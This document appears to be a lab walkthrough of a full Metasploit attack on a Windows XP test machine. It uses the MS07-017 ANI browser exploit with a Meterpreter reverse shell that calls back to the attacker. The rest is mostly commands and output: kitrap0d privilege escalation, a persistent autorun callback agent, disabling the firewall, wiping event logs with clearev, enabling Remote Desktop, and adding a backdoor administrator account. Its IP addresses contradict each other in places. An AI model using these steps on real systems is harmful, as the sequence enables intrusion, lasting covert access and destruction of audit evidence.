Local Host:
on
192.168.1.105 (TEST-BT) machine with BT and MSF
on
msf > use windows/browser/ms07_017_ani_loadimage_chunksize msf exploit(ms07_017_ani_loadimage_chunksize) >set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms07_017_ani_loadimage_chunksize) >set SRVHOST 192.168.1.105 msf exploit(ms07_017_ani_loadimage_chunksize) >set SRVPORT 8080
msf exploit(ms07_017_ani_loadimage_chunksize) >set LHOST 192.168.1.105set LPORT 443 msf exploit(ms07_017_ani_loadimage_chunksize) >set URIPATH /tryhard
msf exploit(ms07_017_ani_loadimage_chunksize) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.0.105:443 [*] Using URL: http://192.168.0.105:8080/tryhard [*] Server started.
On victim Machine:-
This is case when exploit is not successful-
In Case when u sucessful:-
Switch to your machine. Check if you've got the connection from your target. Once connected, you can continue interact with Meterpreter msf exploit(ms07_017_ani_loadimage_chunksize) > [*] Attempting to exploit ani_loadimage_chunksize [*] Sending HTML page to192.168.0.105:8080... [*] Attempting to exploit ani_loadimage_chunksize [*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.1.105:1162... [*] Sending stage (748544 bytes) to 1192.168.0.105 [*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.0.105:8080) at Wed Sep 29 12:08:22 +0800 2010 Press Enter to check the opened sessions. msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter LON-CL1\testuser @ LON-CL1 192.168.1.252:443 -> 192.168.0.105:8080 msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer: LON-CL1 OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: en_US meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport Hardware MAC: 00:0c:29:d3:6a:60 IP Address : 192.168.0.105 Netmask : 255.255.255.0 Check our privilege level meterpreter > getuid Server username: LON-CL1\testuser meterpreter > getprivs ============================================================ Enabled Process Privileges ============================================================ SeShutdownPrivilege SeChangeNotifyPrivilege SeUndockPrivilege meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32 [*] uploading : /tmp/hacked.txt -> C:\WINDOWS\System32 [-] core_channel_open: Operation failed: 5 Escalate our privilege meterpreter > run kitrap0d [*] Currently running as LON-CL1\testuser [*] Loading the vdmallowed executable and DLL from the local system... [*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\LnZbxqeuZgMB.exe... [*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\vdmexploit.dll... [*] Escalating our process (PID:1316)... -------------------------------------------------- Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit -------------------------------------------- taviso@sdf.lonestar.org --- [?] GetVersionEx() => 5.1 [?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000 [?] Searching for kernel 5.1 signature: version 2... [+] Trying signature with index 3 [+] Signature found 0x285ee bytes from kernel base [+] Starting the NTVDM subsystem by launching MS-DOS executable [?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 180 [?] OpenProcess(180) => 0x7e8 [?] Injecting the exploit thread into NTVDM subsystem @0x7e8 [?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14); [?] WaitForSingleObject(0x7d4, INFINITE); [?] GetExitCodeThread(0x7d4, 0012FF44); => 0x77303074 [+] The exploit thread reports exploitation was successful [+] w00t! You can now use the shell opened earlier [*] Deleting files... [*] Now running as NT AUTHORITY\SYSTEM meterpreter > getprivs ============================================================ Enabled Process Privileges ============================================================ SeDebugPrivilege SeTcbPrivilege SeCreateTokenPrivilege SeAssignPrimaryTokenPrivilege SeLockMemoryPrivilege SeIncreaseQuotaPrivilege SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeSystemtimePrivilege SeProfileSingleProcessPrivilege SeIncreaseBasePriorityPrivilege SeCreatePagefilePrivilege SeCreatePermanentPrivilege SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege SeAuditPrivilege SeSystemEnvironmentPrivilege SeChangeNotifyPrivilege SeUndockPrivilege SeManageVolumePrivilege meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32 [*] uploading : /tmp/hacked.txt -> C:\WINDOWS\System32 [*] uploaded : /tmp/hacked.txt -> C:\WINDOWS\System32\hacked.txt Maintain access by uploading Meterpreter agent meterpreter > run persistence -h OPTIONS: -A Automatically start a matching multi/handler to connect to the agent -U Automatically start the agent when the User logs on -X Automatically start the agent when the system boots -h This help menu -i The interval in seconds between each connection attempt -p The port on the remote host where Metasploit is listening -r The IP of the system running Metasploit listening for the connect back [-] Error in script: LocalJumpError unexpected return meterpreter > run persistence -A -X -p 443 -r 192.168.0.105 [*] Creating a persistent agent: LHOST=192.168.1.252 LPORT=443 (interval=5 onboot=true) [*] Persistent agent script is 613927 bytes long [*] Uploaded the persistent agent to C:\DOCUME~1\testuser\LOCALS~1\Temp\NooAHDFfrAL.vbs [*] Agent executed with PID 1732 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA [*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA [*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/LON-CL1_20100929.2413/clean_up__20100929.2413.rc Exit from the target system. meterpreter > exit Step 4: Create a listener on our machine msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.252 LHOST => 192.168.1.252 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.252:443 [*] Starting the payload handler... [*] Sending stage (748544 bytes) to 192.168.1.105 [*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.1.105:1176) at Wed Sep 29 12:30:27 +0800 2010 Clearing tracks (housekeeping) meterpreter > run disable_audit meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > run getcountermeasure -h Getcountermeasure -- List (or optionally, kill) HIPS and AV processes, show XP firewall rules, and display DEP and UAC policies OPTIONS: -d Disable built in Firewall -h Help menu. -k Kill any AV, HIPS and Third Party Firewall process found. meterpreter > run getcountermeasure -d [*] Running Getcountermeasure on the target... [*] Checking for contermeasures... [*] Getting Windows Built in Firewall configuration... [*] [*] Domain profile configuration (current): [*] ------------------------------------------------------------------- [*] Operational mode = Enable [*] Exception mode = Enable [*] [*] Standard profile configuration: [*] ------------------------------------------------------------------- [*] Operational mode = Enable [*] Exception mode = Enable [*] [*] Internal firewall configuration: [*] ------------------------------------------------------------------- [*] Operational mode = Enable [*] [*] External firewall configuration: [*] ------------------------------------------------------------------- [*] Operational mode = Enable [*] [*] Disabling Built in Firewall..... [*] Checking DEP Support Policy... meterpreter > clearev [*] Wiping 942 records from Application... [*] Wiping 1984 records from System... [*] Wiping 1 records from Security... Enabling and Accessing Remote Desktop meterpreter > run getgui -e [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez carlos_perez@darkoperator.com [*] Enabling Remote Desktop [*] RDP is disabled; enabling it ... [*] Setting Terminal Services service startup mode [*] The Terminal Services service is not set to auto, changing it to auto ... [*] Opening port in local firewall if necessary [*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20100929.3437.rc meterpreter > shell Process 820 created. Channel 18 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\testuser\Desktop>net user hacker P@ssw0rd /add net user hacker P@ssw0rd /add The command completed successfully. C:\Documents and Settings\testuser\Desktop>net localgroup administrators hacker /add net localgroup administrators hacker /add The command completed successfully. C:\Documents and Settings\testuser\Desktop>^C Terminate channel 18? [y/N] y meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport Hardware MAC: 00:0c:29:d3:6a:60 IP Address : 192.168.1.105 Netmask : 255.255.255.0 meterpreter > Remote Desktop Connection Open a new shell console, and run Remote Desktop client to connect to the target machine. root@bt:~# rdesktop 192.168.1.105 WARNING: Remote desktop does not support colour depth 24; falling back to 16
Exploit is Detected by kaspersky
